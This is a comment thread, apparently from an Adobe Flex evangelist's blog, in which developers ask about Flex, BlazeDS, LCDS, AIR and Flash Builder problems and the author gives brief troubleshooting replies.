Thanks for you Example, I want to connect Wsdl with SSL but I can’t use by step like your example please help me .
from
Thanks very much.
Hi,
We are working on stock trading kind of application, it is basically an flex desktop application i.e. on AIR.
Our requirement is to handle 5000 to 10000 messages updates per second by flex datagrid. For that we are using LCDS 2.6 messaging RTMP protocol.
To achieve this we have generated around 350000 messages in min and push them to LCDS destination, at client end datagrid is able to render 36000 messages only rest of the messages queued in LCDS will keep rendering but they exeeds 1 min time limit.
So our question is whats the maximum messages update would be handled by flex datagrid and is there any way to optimize datagrid to achieve mentioned target.
Note:We already tried to override ‘collectionChangeHandler’ method of datagrid as we are passing ArrayCollection object to dataprovider and then we change ArrayCollection to Array also, as Array is having minimum event handling.
But still we are able to render 36000msg/min only.
Expecting your help on this issue.
Thank you very much.
SANDEEP
Hi Suman,
Please check the article in the URLs below.
Hope this helps.
Hi Khalid,
Yes you can access. Write Java code to communicate with your DB as explained here and then access the Java class from Flex application as explained in this article
Hope this helps.
Hi,
i try to run your source code from “Invoking Java methods from Adobe Flex” and i get error:
MessagingError message=’Destination ‘CreatingRpc’ either does not exist or the dsetination has no channels defined….
can you help me this
thank you.
my Hello.mxml file is for the above query
-satheesh Reddy
Hi,
I am building a component with blaze ds,i have lot of data to be updated through group wise. i have created a tabbar controller and inthat tab bar each tab contains some text fields and other controls. There is one submit button and if i click that button all the entered information has to be passed to the server.Can anyone let me know how to do this.
Hi,
i have some doubt in flex column chart.
i am drawing the column chart with form = curve,i am
drawing a line on mouse over using cartesian data canvas.Now my problem is i want to find line intersection point with curve.
can you give any suggestion on this.
hi sujith,
your sessions in Hyderabad devsummit was awesome,your session made me to get awareness on flashbuilder4.Thanks to Adobe for organising the devsummit,looking forward for more devsummits and more products from adobe.
Regards
Santosh M
Hi Sujit,
I am on, with a flex project development. My client is very particular with the UI, they have developed (which is in HTML mock up). With some tough times, my team has almost achieved all the look n feel, but left with one issue- ‘When user press ctrl+scroll the page shrinks, but the flex component doesn’t shrinks, rather it’s getting chopped off’.
I tried to get solutions for this, but no luck.
Will appreciate your comments on this issue, earliest.
Thanks in advance.
Regards,
Anshuman
I am interested in using a PHP Service for logging in users to a Flex 4 application. Does Flex 4 natively store session data?
Dear Sujit,
Do you know how to deploy a Blzae DS application on Websphere? I can see the samples (Blaze DS test drive) running, but if my application is not working even though I put my project in the same location. Any help would be appriciated. Please let me know if you need more information.
Regards,
Uday.
Hi Sujit,
With reference to my previous question, I just want to ask how to optimise flex datagrid to render as much as message with in a stipulated time period.
Appreciate your comments on thi issue earliest.
Thanks in advance.
Sandeep
hi Sujit,
I recently install flash player 10.0.42.
so my flex application is not running properly..
its not able to find services.
its unable to convert flex.messaging.io.amf.ASObject.
Help me out its very urgent
Hi Sudheer,
Try and share the code to reproduce this or at least the stack trace will help.
Hi Uday,
Can you please share details on what is not working. If there is any error, then please share the details.
Hi Jon,
Flex will not store any session data. If your session is managed using either cookies or URL rewriting, that will work with Flex application cause all the requests are through the browser and so the cookies as well as URL rewriting will happen.
Hope this helps.
Hi Santosh,
Thanks for attending the summit. We too had a great time, looking forward to meet you all again 🙂
Hi Ramesh,
In your Flex application you can access all the UI controls and get the data entered. When the button clicked, access all the UI controls in your tabs and send the data.
Hope this helps.
Hi Satheesh,
Can you please make sure the HelloWorld.class is in the web application classpath (WEB-INF/classes)
Hope this helps.
Hi Kayoto,
Please try the steps in the article below.
Hope this helps.
Dear Sujith,
I am Bhargava and i met u long in Adobe meet. I had a great time with you as well.
Here i have an issue like communication between AIR and Flex. My main concern is i would like invoke an AIR application from Flex and vice versa as well.
Please guide me to do this. I tried so many ways like implementing common interface and placing AIR swf in Flex but i could not succeeded. Thanks in advance.
Bhargava V
Hi Sujit,
1. I want to add a button to a tabnavigator with a label from xml dynamically. That means if i add a new node to existing xml, my tabnavigator shows a button with label specified in the node.
2. How should i fix the length of the button for any variable length value coming from the xml node.
Hi Sujith,
i am trying to do an application using data service in LCDS. need to show data in datagrid from Oracle Database. i have set the database connection and used SQLassembler in data-management-config.xml. and when i run the application i am getting error like this.
ReferenceError: Error #1069: Property maxFrequency not found on mx.data.DataManagementConsumer and there is no default value.
even i have set the inbound and outbound frequency in config.xml.
can you please solve this for me.
Hi,
I am using Flex 3.3, BlazeDS 3.3.0.9520.I am getting the error :
[FaultEvent fault=[RPC Fault faultString=”Send failed”
faultCode=”Client.Error.MessageSend”
faultDetail=”Channel.Ping.Failed error null url:
‘'”]
messageId=”963746F4-07A8-B1B6-09D4-DEE3BF9EDCD3″
type=”fault” bubbles=false cancelable=true
eventPhase=2]
when I delete the browser cookies or restart the server for first call to the sever.I am specifying the endpoint to the RemoteObject explicitly.
Is any setting required in the service-config ,if we are setting endpoint to remote object externally??
Please let me know if you want more information from me.
Awaiting for prompt reply!
Thanks!
Ragini
I’m using FlashBuilder4 Beta2 and dcd for json parsing. I have a data entity with a property of array type.
fml file shows it like this
I get json parse error whenever it encounters empty array like this { “something”:[] }
1. Do you know where I can get the source for plugin, com.adobe.serializers.json…, so I can debug?
2. Where can I find any doc for .fml format to configure certain parsing rules?
hello~!
I have a question~!
how to convert AS Object to Java Object~!
Hi Sujit,
I met you in Dev Summit in chennai.
i am facing issue in sending JSON request using httpservices.send() method.
Its showing error that Variables not defined. Though i am sending only String.
Can you provide me some example on it.
Hey,
Anorder to retrieve embedded metadata from an .FLV file do you have to load the .flv through netstream object? What if you just want to retrieve the data to make a cue point list and not load/play the .flv?
Thank you,
George
I downloaded Blazeds turnkey integrated with Tomcat6 from the following link and followed the instructions on how to install. (here is the link ..) This installation is not configured for port 8400 but is instead configured for port 8080. I can’t figure this think out. Any ideas?
Hi,
Great job!
I am using flash builder 4 and Coldfusion, i ‘ve tried your tutorials and have an idea how dcd works. The question is if dcd can be used with a remote Coldfusion server and still have all the easy to use functionalities as you present in your tutorials. It would be great if you write a tutorial or point me to another website. All I need to know is how to set up the ColdFusion root folder, Web root and Root URL and then just connect to a data/service.
Thank you,
Giorgos
Hi,
am Subhash working on flex chat application using blazeDS,
i want to write all chat what am sending to client in a text file, here am doing as follows
private function send3():void
{
producer.send(message);
RmSrv.writetofile(“poposdfasdfasdfsdf”);
}
while running application am getting error as follows
“Channel.Security.Error error Error #2048 url: ‘’
if i comment remote object calling method
//RmSrv.writetofile(“poposdfasdfasdfsdf”);
application working but not writing in to file,i want to write in to a file,how can i do this ?
where i need to tune & in which config file i need to change ?
Hi sujith,?
Hi,?
I recently updated the flash player 10.0.42, my code works perfectly in 10.0.32, but gves me the following error. Below is the stack trace
[BlazeDS][DEBUG] Deserializing AMF/HTTP request
Version: 3
(Message #0 targetURI=null, responseURI=/3)
(Array #0)
[0] = (Typed Object #0 ‘flex.messaging.messages.RemotingMessage’)
source = null
operation = “getMultiFirm”
headers = (Object #1)
DSEndpoint = null
DSId = “82877EDF-C109-AF1F-E137-6A88F32C77E8”
destination = “entitlement”
timeToLive = 0
clientId = “8288AF3A-CB09-FB03-ECCC-A4C9A02D49D1”
timestamp = 0
messageId = “C1A5D3AA-5FEE-5F05-B33A-4D3932A54275”
body = (Array #2)
[0] = (Object #3)
kopsid = null
action = null
payload = (Externalizable Object #4 ‘flex.messaging.io.ArrayCollection’)
(Array #5)
[0] = (Typed Object #6 ‘com.test.abcd.genericrequest.RequestParams’)
value = “AMFDATA”
key = “RESPONSETYPE”
msgtype = null
version = “1.0”
[BlazeDS][DEBUG] Serializing AMF/HTTP response
Version: 3
(Message #0 targetURI=/3/onStatus, responseURI=)
(Typed Object #0 ‘flex.messaging.messages.ErrorMessage’)
rootCause = (Typed Object #1 ‘java.lang.ClassCastException’)
localizedMessage = “flex.messaging.io.amf.ASObject”
message = “flex.messaging.io.amf.ASObject”
cause = null
destination = “entitlement”
headers = (Object #2)
correlationId = “C1A5D3AA-5FEE-5F05-B33A-4D3932A54275”
faultString = “flex.messaging.io.amf.ASObject”
messageId = “8288B371-E509-702F-EA1F-D8224ED62A8B”
faultCode = “Server.Processing”
timeToLive = 0.0
extendedData = null
faultDetail = null
clientId = “8288AF3A-CB09-FB03-ECCC-A4C9A02D49D1”
timestamp = 1.264015980725E12
body = null
The requestParams object is serializable and I am using arraycollection in the flex UI.
Please help this is urgent. This works perfectly fine in flash 9 and 10.0.32, but gives errors in 10.0.42
Dear Sujith,
I am a Flex,Java developer. Please suggest me some sample project in Flex 3 or Flex 4.
Waiting for your kind reply.
Thanks in advance.
Hi Sujeet,
Iam new to flex.
I have developed a small flex apllication which calls a webservice which is there on my machine
I deployed the flex application in IIs.
When i browse the swf file from IIS, following error is thrown
“[RPC Fault faultString=”Security error accessing url” faultCode=”Channel.Security.Error” faultDetail=”Unable to load WSDL. If currently online, please verify the URI and/or format of the WSDL”
Do i need to set anyhting in the IIS,
thanks,
Naresh
Hi Sujith,
Am Chandra and working on Flex..now i am working with flex calendars..can u plz give me an idea How to create a calendar with events in Flex or Actionscript? this is urgent. plz help me.
Regards,
chandra.
Hi Sujeet,
iam naresh, iam new to flex.
I created a simple application where a user can upload images to a server
i deployed my application in iis and when i run the application from the iis it’s giving me the following error
SecurityError: Error #2148: SWF file cannot access local resource:\ToPublish\ReceiveImages\UploadedFiles\20101\26\People01.gif. Only local-with-filesystem and trusted local SWF files may access local resources.
i have copied the crossdomain.xml file at my root directory of IIS
This is my to upload the image
request=new URLRequest(“”+strUserName );
request.method=URLRequestMethod.POST;
file.upload(request,file.name);
thanks
Naresh
Hi Sujeet,
Iam naresh, iam new to flex.
I have developed a simple application which is used to upload images on the server and show the images in horizatal list box.
I provided a button “AddPhoto” which on click displays a module which will popup a file dialog box.
There is a button for upload in the module form. When user clicks on the button after selecting an image,iam sending a request to a webpage which is again in IIS . the web page recieves those images and saves the image files on the server
Iam using the following code in flex to upload the file
request=new URLRequest(“”+strUserName );
request.method=URLRequestMethod.POST;
file.upload(request,file.name);
This works fine when I run the app from the flex builder. Images are uploaded and displayed in the horizontal box which I use to display uploaded images(what I do here is whenever user uploads I store this path in a collection and ssing this collection as dataprovider to the Horizantal list box)
I deployed my application in IIs and when I browse my swf file url from another machine for the first time the upload wroks but the images are not displayed in the horintal list box. Also when I click on the “AddPhoto” button for the second time my screen gets disabled and nothing happens.
thanks,
Naresh
Hi Naresh,
I think you need to edit the crossdomain.xml file which stands on your local machine, have a look on adobe’s knowledge base site at
thanks,
Giorgos
Hi Sujith,
I have strucked in my application.It’s giving following error message.
[RPC Fault faultString=”Attempt to begin a DataServiceTransaction when an existing transaction was already in place.” faultCode=”Server.Processing” faultDetail=”null”]
at mx.data::ConcreteDataService/[C:\depot\DataServices\branches\lcds26_hotfixes\frameworks\projects\data\src\mx\data\ConcreteDataService.as:2556]
at mx.data::CommitResponder/fault()[C:\depot\DataServices\branches\lcds26_hotfixes\frameworks\projects\data\src\mx\data\CommitResponder.as:176]]
Please help me out to resolve this issue.
Thanks in advance.
Regards,
Mk
Hi Chandra,
Please have a look on below link for calender.May be it will give some idea to you.Sample application available in Tour de Flex also.
Regards,
Mk.
Hi Sujit,
I’m working on a flex application where I have a datagrid as a data entry component(I’ve assigned an empty arraycollection to this datagrid). I have about 4 columns in it and I have created itemrenderer for each column which, based on some conditions like, value should not be blank, value’s length should not exceed 8 characters etc,.I am coloring the cell to red(itemrenderer is a custom actionscript class which extends Label). I have a ‘Save’ button just below this datagrid. On click of this ‘Save’ button i want to check which cells are colored so that if at all there is any cell on the grid which is colored in red, i can stop the ‘Save’ logic in it’s click event. How can I validate this on click on ‘Save’? Can you please help me??? 😦
How to put a value into a Boolean field?
Is it possible to add these following values?
1) “true” (or “false”)
2) 0 (or 1)
The Boolean value is put into the database is always 1
Hi Giorgos,
yes there was some problem with my cross-domain file
i fixed that.
Any way thanks for ur reply
thanks,
naresh
Hi Sujit,
I hope you will get enough time to response to my query.
I am basically a java programmer and beginner to flex. My problem is – I am having a java api (.jar) on local file-system. I want to invoke methods from that api. But the things is I don’t want to create any background service or starting a server on localhost. Is it possible? If so how?
Convey!
I am facing one issue, tried a lot,
in RPC
I am passing the Arraycollection (array of simple POJO objects) to JAVA, and expecting this will be arraylist,
while converting that list to simple POJO object, I am getting ClassCastException : java.util.hashMap.
Could you please suggest some way to resolve this?
Hi everyone, I would like to set up a ColdFusion Gateway to talk to my Flex app via BlazeDS, but the catch is, it’s an EXTERNAL BlazeDS server. I see there is info on integrating CF with BlazeDS by installing them on the same machine, but I specifically want ColdFusion and BlazeDS on different servers. How can this be accomplished? Thx in advance.
Sujit,
I was working on a Flex app where session management was handled by cookies. We are now trying to migrate the same application to AIR without touching the server code. How do you think should I go with the session management in AIR??
Without making any changes on server side… I thought of handling the headers for every request of my own (if I could get the cookie by reading the response header, I could explicitly set them up for every subsequent request), but unfortunately HTTPService or RemoteObject doesnt give me access to headers by any ways. What do you think can be done?
Thanks in advance.
Hello Sujit,
If you have time, would you mind giving us a sample .FLA file of the Google Calendar Project. It’s because we can’t run it with the reason of an error that’s always popping up. Or even for anyone in this board.
Thanks in advance.
Hi Sujit,
I have got one challenging question for which I am banging my head. Let me put the question in a simple way..
I have an Advanced Data grid which has a total of 6 advanceddatagrid columns. Out of the 6 columns 4 of them are divided as AdvancedDatagridGroupedColumns which inturn again have 4 advanced datagrid columns…so the columns are like App_name, A(grouped advanced datagrid colum…inturn contains a1,a2,a3,a4),B(b1,b2,b3,b4),C(c1,c2,c3,c4),D(d1,d2,d3,d4) and Count
I had set the background colors for the 4 grouped column A,B,C and with 4 different colors..
Now my requirement is to get ALTERNATING ROW COLORS for the grouped columns (i.e for A,B,C and D) and not for app_name and Count…
For Eaxample if I give the background color for the grouped Column A as dark Blue then the ALTERNATING ROW COLORS of the grouped column should in such a way that the first row of the a1,a2,a3 and a4 should only be DARK BLUE and the second row of the same grouped column A (a1,a2,a3,a4) should be LIGHT BLUE..
Also another req is that I need to give the header colors to only A,B,C and with their respective background colors.
Here is the samplecode..
######################################### This is my AdvancedData Grid with Grouped Columns ##########################################
############### This is the StyleFunction Name that I am providing to AdvancedDataGridColumnGroup ################################
private
function ADGStyle(data:Object, col:AdvancedDataGridColumnGroup):Object
{
// var rowColumnIndex:adva
/* var vals:Array = [0, 2, 4, 6];
var i:int = fullDeployDGLinux.dataProvider.getItemIndex(data);
if (vals.indexOf(i) >= 0){
var o:Object = new Object;
//o.color = 0x000000;
//o.fontWeight = “bold”; alternatingItemColors=”[0xFFE0E0, 0xE0E0FF, 0xeaf1dd, 0xe5e0ec]”
o.backgroundColor = 0xFF0000;
return o;
}
else return null; */
if(col.headerText ==”PA1″)
{
Alert.show(
“rakesh”);
var i:int;
var rc:int = fullDeployDGLinux.rowCount;
for(var i=0;i >= rc; i+2)//fullDeployDGLinux.getChildAt(rc %2)
return {rowColor:0xFF0000}; //styleFunction=”ADGStyle”
}
return{rowColor:0x000000}
}
#################################################### I only provided the styleFunction for the first AdvacedDataGridColumnGroup… The ADGStyle function is not being called (tested it using the Alert Statement).. I guess the function needs to get the value from the AdvancedDataGridColumnGroup…I dont know how to pass values to the function as styleFunction is just called by its name and variables cannot be passed by the function..
Also the Header BackGround colors are to be changed only for the Grouped Columns according to their specific Grouped Columns BackGroundColor .. That is also giving me trouble
I had tried out many ways but I m not getting any solution.. I am not sure its correct or not.
I hope you could help me out with this Issue
Hi Sujit,
The previous post was skipped by the Advanced Data Grid Content.
I am pasting the same in this comment..
######################################### This is my AdvancedData Grid with Grouped Columns ##########################################
************************************************************************************************************************************************************************************
Hi Sujit,
The previous post was skipped by the Advanced Data Grid Content.
I am pasting the same in this comment..
######################################### This is my AdvancedData Grid with Grouped Columns ##########################################
******************************************************
Hi All,
I am trying to return java collection objects to flex from a servlet, can any one suggest me the best way to do it.
Thanks in advance.
Dear Sujith,
I have an XML and swf file in the server.
I was using PHP to write to XML file similar to post at
Since xmlData i am sending to of size 40.0kb and 1017 lines of code, i am not able to send using POST method. Here is the code
service.url=”FileWriter.php”;
service.useProxy = false;
service.method=”POST”;
service.resultFormat = “text”;
var parameters:Object=new Object();
parameters.data=xmlData.toXMLString();
service.addEventListener(ResultEvent.RESULT, writeToXMLFileHanlder);
service.addEventListener(FaultEvent.FAULT, writeToXMLFileError);
service.send(parameters);
It is working file in local machine but having problem when we deploy in the server.
Please help. It is very urgen.
Thanks in advance,
Ravichandran J
9886223896
Hi Sujit,
I am working in Seam framework, i want to add flex component to seam framework, This is i did with fiji components.
Now i got springgraph.swf file to be added it is working fine But how do i fill the data for that using Java Calls. can you help me pls
Regards
Devika.N
Hi,
i am trying to run an application using LCDS.when i run the application i am getting below error. could you plz assist me to solve this issue.
ReferenceError: Error #1069: Property maxFrequency not found on mx.data.DataManagementConsumer and there is no default value.
Hi Sujit
I have used flerry given by Piotr for calling Java API and making connection between flex and java.
Through flerry we can call java API directly.
We need flash builder 4 beta 2 for using flerry
the following is the link from where you can download Flerry-Demo sample.
I wanted to debugg both flex and java together so need ur help if u can.
Help me out if u can
Waiting for ur reply
Regards
Sangita
Hi,
I am currently working in project where we require widgets to be created. Could you help us in providing websites or materials containing the information about developing widgets.
Thanks,
Balaji.D
Hi,
I love Flex based RIA’s.
We all want to spread this wonderfull technology right?
I dont understand why you Flex Evangelists do ‘not’ use Flex technology as BLOG System? I understand that it is easier to use WordPress rather than developing a own silmple blog system, but this begavior only supports all Flash/Flex haters.
Think about that, please and spread the message.
Love and Light
daslicht
Hi Sujit,
I m working on flex php pagination(runtime)…
which get the data run time..
i am showing first 10 pages by default..
As page no.1 fetch first 10 records by default..
on click page no.2 it will fetch records from 11 to 20 from database using php.
the navigator has next button on click it should be go on page no. 11 and should show record with respect to that page..
My problem is when i click next button the default selection is done on page no. 11 but it shows an TypeError: Error #1010: A term is undefined and has no properties.
and page no. 11 is apper blank..
Hai sir,
I want to implement an email application.I went through some sample codes for that.but i’m confused now bcoz most of it contains php codes.Can we do it without using php in flex?If we are using php,how to call it our flex3?
Hope u reply soon…
Ad.thanx
hello sujith ,
how can i send email from flex-java application
Hi Sujit,
I am looking for the way to log/save all messages in database, sent to BlazeDS to specific destination.
Any suggestion/idea is much appreciated.
Best Regards,
MArko Simic
Hi Sujit,
I want to apply multiple color to single area series…
how to do this…?
please help…
Thanks in advance..
Pramod Ingole.
Hi Sujit,
I am currently working on BlazeDS and trying to get some data from Java to Flex.
There is a specific case where I have a user object that I am trying to get. The user object in Java has a Role object inside it. My problem is that while I am getting the User object, I am not able to receive the Role in the Flex side. It is giving me nulls.
Please advice on what I can do on this.
Thanks.
Sujit,
Thanks for all the great info. Can you help with this:
I have used the RDS service in FlashBuilder4 to generate the services files (_Super_MyService.as, MyService.as, etc)
And it all works great when building in FB4.
But when I go to compile with command-line ant, it fails.
Because it cannot find: RemoteObjectServiceWrapper
Can you say what library or swc needs to be injected into the ant build?
(I see FB4 references: fds.swc, fiber.swc, serializers.swc)
And, equally important, indicate how tell ant to use the required libs/swcs?
Hi Sujith,
I’m with the trial version of flash builder 4 premium standalone and i’m trying to integrate it with java with WPT (i can’t manage to install it), could you help me out by explaining how to do that?
Thank You
=]
Hi Sujith, i have a question…:) i have the professional blazeds book by Shashank Tiwari
i am trying to run one of the samples in the book..but i have had no success, i hope you can point me in some directions. my background is heavy flex, so the java side of things i would i am a newbie.
first of all, i have a EnergyConsumptionDataService class that has a public method returning a List. within the class i have a declaration like this
List list = new ArrayList();
for some reason eclipse does not like this(i get warnings). and this is declared in the book.the errors i get are
ArrayList is a raw type. References to generic type ArrayList should be parameterized
&
List is a raw type. References to generic type List should be parameterized
i have imported the class
import java.util.*; (doesnt get rid of error)
and
import java.util.ArrayList; (doesnt get rid of error)
the next question is are you familiar with hsqldb?? the sample uses it but doesnt show you how to implement it for the blazeds example. do you know what i need to have on my client/server side to make hsqldb work?
appreciate your thought on this. Thanks
Kofi
I’m using LC ES Designer 8.2 and I have create a quote form. Once the 1st part of the form is completed the user would then hit a submit button to email to customer however the customer could then change the quote since it is a form. at the bootom of the form I add a section for the customer to add a PO and date for service and then print and email back.
How can I protect the first part onthe form so the customer does not have access to change
Hi Sujit,? I am a little curious to know since it shares the same IDE for actionscript Development.
Hi, I want to use some system API’s in my AIR application ….. how can i use that one …. like in tabble application
I would like to know the comparison of BlazeDS 3.x with 4.x. I cannot find that information anywhere. Does 4.x include client side sync?
Hi Sujit,
I am deveoping a flex-balzeds (java backend)..this application is under SSO.my actual problem is “if i am trying to access my flex application through virtual hosturl i am unable to form a amfchannel..If is access with physical box url iam able to work normally”
i tried with cross domain.xml..but in vein
errorID = 0
faultCode = “Client.Error.MessageSend”
faultDetail = “Channel.Connect.Failed error NetConnection.Call.Failed: HTTP: Failed: url:
Yeah being able to built the gui in flash and using flex components would be nice.
Are there finally viewstates in Flash CS5 ?
Hi sujit,
i am having an arraycollection of video files parsed from xml tht i wanna display in videodisplay. i wanna play them without the userinteraction(play in sequence,one after the other).if user wants he can click what ever video he want tht is working fine.but as soon as the player starts it go on playing all the videos in sequence. its playing 1st video and stops ,so how to give condition to get into the next video. plz chk my code and provide me the solution or guide me to the right way.in my code videoVO1 is the AC into which i get videofiles from xml. as i gave zero its playing 1st video,but if i give anyother num it is showing range error.
private function resultHandler(event:ResultEvent):void
{
var linkvideoAC:ArrayCollection=new ArrayCollection();
var xml:XMLList=XMLList(event.result).children();
var links:XML;
var videoVO1:ArrayCollection=new ArrayCollection();
for each(links in xml)
{
var linksVideos:XMLList=links.link;
for(var i:int=0;i<linksVideos.length();i++)
{
videoVO1.addItem(linksVideos[i].children());
videoDisplay.source='videos/'+videoVO1[0];
trace("my length is"+videoVO1[0].toString());
}
if(videoDisplay.playheadTime==videoDisplay.totalTime)
{
for(var j:int=1;j<linksVideos.length();j++)
{
videoVO1.addItem(linksVideos[i].children());
videoDisplay.source='videos/'+videoVO1[j];
}
}
}
}
Good Morning,
I have been working successfully with Flex Builder 3-am now trying to migrate code to FB4. My configuration is : Windows xp + Tomcat 6 + MySQL + BlazeDS 4 + FB 4.
Issue: When i try execute the ‘connect to Data/Service’, i get a ‘Status code:500, Reason: Internal Server Error.
Notes:
Your “remoteobjects.RemoteServiceHandler” runs w/o problems.
I ma able to run normal jsp servlets that call the dbms w/o trouble using the jndi emulation that Tomcat provides for managing db pooling.
i copied the suggested RDS servlet reference to the app’s web.xml for mapping the RDSDispatchServlet
The jndi reference is located in my app’s context.xml.
I have tried with and without requiring a password.
Please help, i really would like to take advantage of the code generation FB4 offers.
p/s i have found no references to how to set up RDS for FB$4 + Java in the Help files. But that is another issue/problem. IMHO—Adobe should provide ready to run examples complete with server configuration etc. I’ve already spent a lot of time googleing the web trying to find the answers. Thanks to you for the examples you have provided — w/o them i would not have gotten this far . But i have a question: why does a programmer have to go thru this process for a commercial product?
Hello again,
oops — i found it.. googled “how to configure a Remote Development Services (RDS) server Flex” got a hit re:LCDS adobe help online doc.
thanks for all your contributions — i’ll take a rain check for my next issue
hey Sujit..
can u please give a good diffrence between itemeditor and itemrenderer?
Thanks
Hi Karuna,
Good to know that you found the solution 🙂 I am sorry I didn’t get your second question, what process?
Hi hezal,
Please find the articles in the URL below
Hi Madhu,
Please try listening to complete event of VideoDisplay () and then play next video.
Hi dl,
I don’t think so.
Hi Nagendra,
Please try checking the channel URL in the services-config.xml
Hope this helps.
Hi Santosh,
I couldn’t find a comparison chart, it should be available soon. As far as I know there are lots of improvements and additions including Spring BlazeDS bundling with BlazeDS and support for Data-centric development features in Flash Builder 4 🙂
No, BlazeDS 4.x doesn’t have multi client sync, multi client sync is part of data management service, which is available in LCDS. But with Flash Builder 4, you can try client side data management, please find details here
Hope this helps.
Hi Chetan,
Please find details here
Hope this helps.
Hi Kartik,
I think I answered this when I met you in Ahmedabad 🙂
Hi John,
I have no idea on that. Please try asking the question here
🙂
Hi Kofi,
Looks like you are using Java 1.5 and higher for compiling your Java project. Try this List list = new ArrayList();
For setting up HSQLDB try article in this URL else install MySQL 🙂
Also try Data-Centric development in Flash Builder 4, connecting to back-ends is tooo easy, please find details here –
Hope this helps.
thanks sooo much. i will look into what you have said :))))
Hi Vinicius,
Flash Builder 4 is eclipse 3.5 based, can you make sure the plug-in you are installing is for 3.5 version.
Hi GoldEye,
You will need all three swcs. Just adding these to your project libs folder should help.
Hope this helps.
Hi Pramod,
If you can share the code to reproduce this, we can check what might be going wrong.
Thanks.
Hey Sujit
Thank for your help.
I have one more question that
what are the differences and similarities between 3 PRCs(RemoteObject , HttpSrvices , Webservices).
And which should be used when(for what purpose)?
I gone through some site but I didnt get it yet.
Thanks
hi sujit,
thanks for ur guidance, i got it. i have accordian(in tht vbox+linkbutton which has links to videofiles),each pane have diff num of video files parsed from xml,i want panes to move without user interaction and particular link shud get highlighted ,as the videofiles playing.
thanks in advance.
I’m gettin this error in WebSphere Server v6.1. The Servlet is not able to do it’s init()… I get the error:
SRVE0100E: Did not realize init() exception thrown by servlet Transaction Controller: java.lang.VerifyError: (class: javax/xml/marshal/StreamScanner method: fail(ILjava/lang/String;)V) at pc: 97
Only me setup gets this, my colleauges setup does not have this problem and I have the same WAS6.1 version and application installed…go figure.
Anyone else run into this one?
Hi Sujith,
Can you please guide me a little in learning Flash Builder 4 ? What are the areas i should concentrate on and learn ? What are the skills i must acquire to be an expert in Flash Builder and RIA ? I am a student of Computer Science and Engineering, III year.
Hi Sujit,
I am trying to access a WSDL file which is in local file system by using the . But i get an error – faultDetail=”Unable to load WSDL. If currently online, please verify the URI and/or format of the WSDL.
Please suggest me a way of doing it.
Thanks in advance,
Harshi
This is how i access the WSDL file.
mx:Webservices wsdl=”file:/C:/LoginService.wsdl”
Hi Sujit,
Thanks for your input.
Hi sujith reddy,
1.I am trying to integrate flash photo gallery into flex application, am not success to do ,please could you help me with giving any reference links or source code .it is possible? am using flex 3.
2.Am trying movie clip masking using (swf) in flex application, am failed to success, i referred tour de flex but i failed to do. could u help me.
Hello,
I find your blog very useful. I have a question regarding RDS on Tomcat. In the servlet mapping, CFIDE… is specified. Is there anyway to use RDS without coldfusion or livecycle and to use RDS to discover available java classes and methods using only Tomcat and BlazeDS?
Thanks,
Colin
Hi sujith reddy,
can u please suggest me on. Movieclip masking in flex application, i referred tour de flex, i download the source code from it, on executing the same code, it is showing below code in the error panel.
******** error Severity and Description PathResource Location Creation Time Id unable to open ‘\Efflex\bin\Efflex.swc’ ************
please help me, by solving this issue.
Hi Colin,
You can use RDS without ColdFusion or LCDS. Its just an URL mapping, pointing the RDSServlet, which is also part of BlazeDS.
Sujit,
Can you give me an example please? I’m getting an error when I use the xml code snippet you provided on your blog. We have remote developers that want access to the available ‘remotable’ methods and this would really help us! The error that I’m receiving is:
Error executing RDS command. Status Code 404, Reason: /blazeds/CFIDE/main/ide.cfm.
We don’t have that cold fusion module – we’re not running cold fusion. How should the RDS Servlet be mapped?
Thank you for your help.
Hi Harshi,
Please try changing the URL to
Hope this helps.
Hi Subodh,
Please try articles in this URL and
Hope this helps.
Hi Colin,
Looks like the servlet mapping is not done properly. Please check if there are any errors in the web server log and also please check if you have the flex-rds.server.jar in your web application bin folder, if not please use BlazeDS 4.0 or try this article
Hope this helps.
Sujit,
Hmm. Now it works! I am using BlazeDS 4.0 – I may have been pointing to the wrong context in the Flash Builder project.
There was an error that I found in the RDS Servlet mapping though – the made the xml compiler choke. I changed it to id=”rds..”> and it worked. Any ideas here?
Thank you.
Sujit,
Another question – RDS looks like it’s working now, but how do I package this up in an AIR app for desktop deployment?
Thanks again,
Colin
Hi,
Flex AIR (SDK 4) have property “alwaysInFront”. And yes, it is working almost always but when i run some game – that window hide… I think it’s because games use OpenGL/DirectX.
I try make overlay/transparent layer in games/programs but i dont know how do solve this problem.
It’s possible because The Procaster Application from livestream.org have that future.
Any ideas? Or help? How do that?
Hi Colin,
Please check the articles for details on how to configure the configuration files for an AIR application.
Regarding the error, I am not sure. Can you please share the XML snippet, I will try to reproduce the same.
hi sujit,
i have a complete project with videodisplay tht plays .flv files with play,pause,next video,prev ,but now we would like to add .swf files to it. Is there any possibility tht we can play .swf file in videodisplay or how can we change the project just to replace the .flv files to .swf, we r parsing the data from xml.pls advice.
thanks in advance.
madhu.
hi sujit,
in video display i just added the arraycollection of videofiles to the source of videodisplay, so can i replace the videodisplay with swfloader? bcoz in swf loader also if we pass .swf to source for tht to play.do we need to load the swf file bfore playing?some examples r like tht. i dint find good examples for playing a list of .swf files tht r parsed from xml.plz provide me some links. i have a requirement tht i have to b able to click on the link in the .swf file while playing. unless u click on it, the file will not move.plz help.
madhu.
hey sujit,
i try to use the as3googlecalendarlib…
thx for share it….
but i have somme error with falsh cs4 ide
GoogleCalendarVO.As line:66 Error 1047: Parameter initializer unknown or is not a compile-time constant.
GoogleCalendarVO.As line:78 Error 1047: Parameter initializer unknown or is not a compile-time constant.
GoogleCalendarEventUtil.As line:109 Warning: 3594: getTime n’est pas une méthode reconnue de la classe dynamique Date.
how can solve the problem,…
i hope sincerely that you ‘ll answer to my post,….
best regards,…
Hi Sujit,
My application is using flex as front end as java as back end with BlazeDS.
I have a method to get the data from the DB. I get “java.lang.NullPointerException : null” error when I hit for data from flex using IE 8 but while using Firefox I am not getting any exception.
What I need to do to solve this for IE??
Thanks,
Rakesh
Hello Sujit:
How are you?
I am one of the attendee in Pune Flex 4 tour at Pune last month.
Thanks for such a wonderful demonstration.
I have got one problem it would be gr8 if you help to solve it.
I have one database of 30 lac records in it,
Fields are ID, Name & Mnumber(10 digit mobile number)
i want to create autocomplete textbox which suggest number acoording to user input data, for example
lets say user enter 98 so it will show all the matching entries (not all but atleast 10 records)
again if user entered 982 so it will show matching records from database.
How do i achieve this, means 30 lac records is the main problem for me.
Please suggest.
Thanks & Records
